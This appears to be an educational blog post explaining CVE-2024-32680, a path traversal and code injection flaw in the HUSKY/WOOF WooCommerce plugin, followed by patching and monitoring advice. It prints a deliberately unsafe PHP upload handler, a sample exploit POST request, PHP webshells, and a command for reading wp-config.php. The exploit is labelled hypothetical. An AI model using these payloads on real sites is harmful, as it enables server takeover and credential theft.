CVE-2024-32680 - Path Traversal & Code Injection Vulnerability in PluginUS HUSKY – Products Filter for WooCommerce (WOOF)

If you run a WooCommerce-powered shop on WordPress, you may have come across HUSKY – Products Filter for WooCommerce, also known as WOOF. It’s a popular plugin for creating advanced product filtering systems on online stores. But in early 2024, a critical security flaw – CVE-2024-32680 – was discovered in the plugin, threatening the security of thousands of websites.

In this post, we'll break down the details of CVE-2024-32680, show how the vulnerability works (with code snippets), reference original sources, and explain how attackers can exploit it to gain control over a WordPress site — all in simple, clear language.

How Does CVE-2024-32680 Work?

The plugin fails to properly validate input paths and user-supplied files, allowing a hacker to upload specially crafted files and execute arbitrary code. This type of attack is known as a path traversal and code injection vulnerability.

Path Traversal: Why Is It Dangerous?

Path traversal means a user can trick an application into accessing files and directories that are outside of its intended scope. By using path traversal characters like ../, an attacker can manipulate file paths to reach other directories.

Code Injection: What’s the Risk?

If an attacker can upload and execute their own files (like a PHP webshell), they can run commands as if they were the owner of your site.

Attacker finds the vulnerable endpoint in your WOOF plugin.

2. They craft a payload that abuses file path handling — using ../ to break out of the intended directory.

They upload a malicious PHP file (say, a webshell) to your server's plugin folder.

4. By visiting their uploaded file, they execute any code they want — as if they own your WordPress site.

Below is a simplified (and hypothetical) example of how something like this could happen in PHP

// Example: vulnerable file upload handler

$upload_dir = '/var/www/html/wp-content/plugins/woof/uploads/';
$filename = $_POST['filename'];
$file_contents = $_POST['file_contents'];

$file = $upload_dir . $filename;

// Not checking for '../' -- so attacker can write files outside this folder!
file_put_contents($file, $file_contents);

// Now a browser can access the malicious file if placed in wp-content

What’s wrong?
- No validation that $filename is safe — so a hacker can use something like ../../malicious.php

An attacker could send a POST request like this

POST /wp-admin/admin-ajax.php?action=woof_save_file HTTP/1.1
Host: victimsite.com

filename=../../malicious.php
file_contents=<?php system($_GET['cmd']); ?>

This creates a file called malicious.php two directories up—possibly somewhere directly accessible by the web server. Then, by visiting http://victimsite.com/wp-content/plugins/woof/malicious.php?cmd=ls, the attacker runs server commands!

Real-World Example: Deploying a Webshell

A webshell is a PHP file that gives attackers a web interface to control your server.

malicious.php

<?php
if(isset($_REQUEST['cmd'])){
    echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>

List files: ?cmd=ls

- Download your wp-config file: ?cmd=cat+../../wp-config.php

Original References

- Vuldb: CVE-2024-32680
- Wordfence Threat Report
- NVD - CVE-2024-32680

How to Protect Your WordPress Site

1. Update Immediately!
As soon as a patch is available, update the HUSKY (WOOF) plugin to the latest version.

2. Limit File Uploads
Don’t let users upload files unless absolutely necessary. Always validate file paths and names.

3. Monitor for Strange Files
Scan your wp-content and plugin directories for unexpected PHP files.

4. Use a Security Plugin
Tools like Wordfence or Sucuri can catch suspicious activity.

5. Backup Your Site Regularly
Have backups so you can quickly restore if something goes wrong.

Conclusion

The CVE-2024-32680 vulnerability is easy to exploit and can be devastating for online stores. If you use the HUSKY (WOOF) plugin on your WooCommerce site, update immediately and review your security settings. As always, use the principle of least privilege, and never trust unsanitized user input.

Stay safe — patch early, back up often, and monitor your sites!

Exclusive note:
The exploit described here is distilled and simplified for educational awareness. Always act responsibly and only test vulnerabilities on systems you own or have explicit permission to test.


For more on keeping your WordPress site secure, visit wordpress.org/support/security.

Timeline

Published on: 05/17/2024 09:15:38 UTC
Last modified on: 05/17/2024 18:36:05 UTC